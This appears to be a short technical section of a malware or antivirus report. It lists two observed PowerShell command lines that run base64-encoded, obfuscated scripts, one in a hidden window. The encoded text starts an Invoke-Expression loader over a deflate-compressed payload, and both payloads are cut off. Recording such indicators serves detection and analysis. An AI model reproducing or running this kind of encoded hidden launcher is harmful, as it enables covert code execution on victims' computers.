Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFAAcwBIAE8AbQBFAFsAMgAxAF0AKwAkAFAAcwBIAG8AbQBFAFsAMwA0AF0AKwAnAFgAJwApACgAIABuAGUAVwAtAE8AYgBKAEUAYwBUACAAIABJAE8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBEAEUAZgBsAEEAVABFAHMAdAByAE...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFAAcwBIAE8AbQBFAFsAMgAxAF0AKwAkAFAAcwBIAG8AbQBFAFsAMwA0AF0AKwAnAFgAJwApACgAIABuAGUAVwAtAE8AYgBKAEUAYwBUACAAIABJAE8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBEAEUAZgBsAEEAVABFAHMAdAByAE...' (with hidden window)